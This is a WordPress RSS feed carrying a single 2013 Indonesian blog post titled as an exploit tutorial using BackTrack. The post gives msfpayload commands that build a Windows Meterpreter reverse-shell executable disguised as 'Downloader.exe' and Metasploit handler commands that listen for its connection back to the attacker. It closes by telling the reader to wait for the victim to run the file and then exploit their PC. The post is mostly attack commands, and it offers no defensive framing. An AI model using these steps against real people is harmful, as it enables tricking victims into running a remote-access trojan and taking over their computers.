<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>sharingilmuteknologi</title>
	<atom:link href="https://sharingilmuteknologi.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>https://sharingilmuteknologi.wordpress.com</link>
	<description>@SetiaGagah D&#039;Sevenfold</description>
	<lastBuildDate>Sun, 03 Nov 2013 04:44:57 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<site xmlns="com-wordpress:feed-additions:1">60110128</site><cloud domain='sharingilmuteknologi.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>https://s2.wp.com/i/webclip.png</url>
		<title>sharingilmuteknologi</title>
		<link>https://sharingilmuteknologi.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="https://sharingilmuteknologi.wordpress.com/osd.xml" title="sharingilmuteknologi" />
	<atom:link rel='hub' href='https://sharingilmuteknologi.wordpress.com/?pushpress=hub'/>
	<item>
		<title>Tutorial ekploit dengan backtrack</title>
		<link>https://sharingilmuteknologi.wordpress.com/2013/11/03/tutorial-ekploit-dengan-backtrack/</link>
					<comments>https://sharingilmuteknologi.wordpress.com/2013/11/03/tutorial-ekploit-dengan-backtrack/#respond</comments>
		
		<dc:creator><![CDATA[vincentsetia]]></dc:creator>
		<pubDate>Sun, 03 Nov 2013 04:44:57 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">http://sharingilmuteknologi.wordpress.com/?p=3</guid>

					<description><![CDATA[Step melakukan exploit : 1. Membuat file exe untuk exploit: ketikan ini, dan secara otomatis akan tersimpan di Dekstop berupa file .exe msfpayload windows/meterpreter/reverse_tcp LHOST=[IP Attacker] LPORT=[Port] x &#62; /folderpenyimpanan/namafile.ekstensi msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.28.2 LPORT=4444 x &#62;  /root/Desktop/Downloader.exe 2. Untuk mengaktifkan eksploit sendiri dapat mengetikkan perintah dibawah ini pada software eksploitasi metasploit msf exploit (handler) &#62; [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Step melakukan exploit :</strong></p>
<p><strong>1. Membuat file exe untuk exploit:</strong><br />
<strong>ketikan ini, dan secara otomatis akan tersimpan di Dekstop berupa file .exe</strong><br />
<strong>msfpayload windows/meterpreter/reverse_tcp LHOST=[IP Attacker] LPORT=[Port] x &gt;</strong><br />
<strong>/folderpenyimpanan/namafile.ekstensi</strong><br />
<strong>msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.28.2 LPORT=4444 x &gt;</strong><br />
<strong> /root/Desktop/Downloader.exe</strong><br />
<strong>2. Untuk mengaktifkan eksploit sendiri dapat mengetikkan perintah dibawah ini pada software eksploitasi metasploit</strong><br />
<strong>msf exploit (handler) &gt; use /exploit/multi/handler</strong><br />
<strong>msf exploit (handler) &gt; set PAYLOAD windows/meterpreter/reverse_tcp</strong><br />
<strong>msf exploit (handler) &gt; set LHOST [IP Attacker]</strong><br />
<strong>msf exploit (handler) &gt; exploit</strong><br />
<strong>contoh</strong><br />
<strong>msf exploit (handler) &gt; use /exploit/multi/handler</strong><br />
<strong>msf exploit (handler) &gt; set PAYLOAD windows/meterpreter/reverse_tcp</strong><br />
<strong>msf exploit (handler) &gt; set LHOST 192.168.28.2</strong><br />
<strong>msf exploit (handler) &gt; exploit</strong><br />
<strong>tunggu sampai korban menjalankan Downloader.exe setelah itu kita dapat melakukan proses exploitasi pada pc korban&#8230;</strong></p>
]]></content:encoded>
					
					<wfw:commentRss>https://sharingilmuteknologi.wordpress.com/2013/11/03/tutorial-ekploit-dengan-backtrack/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">3</post-id>
		<media:content url="https://2.gravatar.com/avatar/50256df2161a8b16017c69daaf433a4b6c34361b89ca41689a2daba71d33fbd5?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">vincentsetia</media:title>
		</media:content>
	</item>
	</channel>
</rss>
